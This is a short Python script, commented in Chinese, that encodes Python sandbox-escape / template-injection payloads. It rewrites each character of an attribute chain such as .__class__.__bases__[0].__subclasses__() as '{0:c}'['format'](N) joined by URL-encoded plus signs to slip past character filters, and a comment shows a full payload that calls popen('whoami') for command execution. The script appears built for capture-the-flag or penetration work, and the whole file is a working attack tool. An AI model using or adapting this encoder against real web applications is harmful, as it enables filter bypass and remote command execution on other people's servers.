#使用方法，product里传参为.__***到引号前面停止，
#举例"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']("whoami").read()
#则只需要分段写入.__class__.__bases__[0].__subclasses__()[127].__init__.__globals__
import re
def product(poc):
    payload=''
    print(poc+"\\n")
    for chr in poc:
        if chr =="[" or chr =="]" or chr =="(" or chr ==")":
            model=chr
            payload+=model
            continue
        model='"{0:c}"["format"](%d)'%ord(chr)
        payload+=model+"+"
    print(payload[:]+"\\n")
    return payload[:-2]+payload[-1]
poc='.__class__.__bases__[0].__subclasses__()[127]'
a = product(poc.replace('_._','_][_').replace('._','[_').replace("_[","_][").replace("_(","_](")).replace('+',"%2b").replace('%2b]',']')
print(a)

def decode(payload):
    res = re.findall("\\(\\d+\\)", payload)
    for i in res:
        print(chr(int(i[1:-1])), end = "")

decode(a)